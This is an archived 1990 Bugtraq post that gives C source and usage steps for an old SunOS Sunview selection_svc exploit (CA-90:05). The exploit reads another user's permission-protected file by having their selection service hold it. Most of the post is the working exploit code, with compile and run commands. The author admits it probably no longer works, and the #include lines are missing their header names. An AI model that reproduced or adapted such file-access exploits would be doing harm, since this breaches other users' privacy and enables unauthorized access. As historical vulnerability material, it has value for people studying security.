**************************************************************************
HACK: Very old selection_svc exploit, CA-90:05
System: SunOS, not Solaris
Source: Bonfield James (jkb@mrc-lmb.cam.ac.uk) post to Bugtraq
Date: 1990
**************************************************************************

Well I've got some code that's been kicking around for years (5 or so
maybe), that exploits a Sunview selection_svc problem. I doubt if it's the
same bug as more recent selection_svc holes, but I do wonder whether people
ever learn from past problems.

I doubt this code works anymore as I doubt anyone uses Sunview these days.

Anyway, thanks to James Beckett (Hiya James!) from whom I snarfed this code
oh so long ago. I would leave it up to James to post this code, but I have
a feeling he may not have it anymore.

        James

/* SELN_HOLD_FILE
 * For use where someone has a selection_svc running as them, after an
 * invocation of suntools:
 *
 * % cat their_private_file
 * their_private_file: Permission denied
 * % cc seln_hold_file.c -o seln_hold_file -lsuntool -lsunwindow
 * % ./seln_hold_file their_private_file
 * % get_selection 2
 * < contents of their_private_file >
 * %
 */

#include
#include
#include

main(argc, argv)
int argc;
char *argv[];
{
    Seln_result ret;

    if (argc != 2) {
        (void) fprintf(stderr, "usage: seln_grab file1\n");
        exit(1);
    }

    /* Ask the selection service to hold the named file as the secondary selection. */
    ret = seln_hold_file(SELN_SECONDARY, argv[1]);
    seln_dump_result(stdout, &ret);
    printf("\n");
}

/*
 * Local variables:
 * compile-command: "cc -sun3 -Bstatic -o seln_hold_file seln_hold_file.c -lsuntool -lsunwindow"
 * end:
 *
 * Static required because _mem_ops not included in ld.so
 */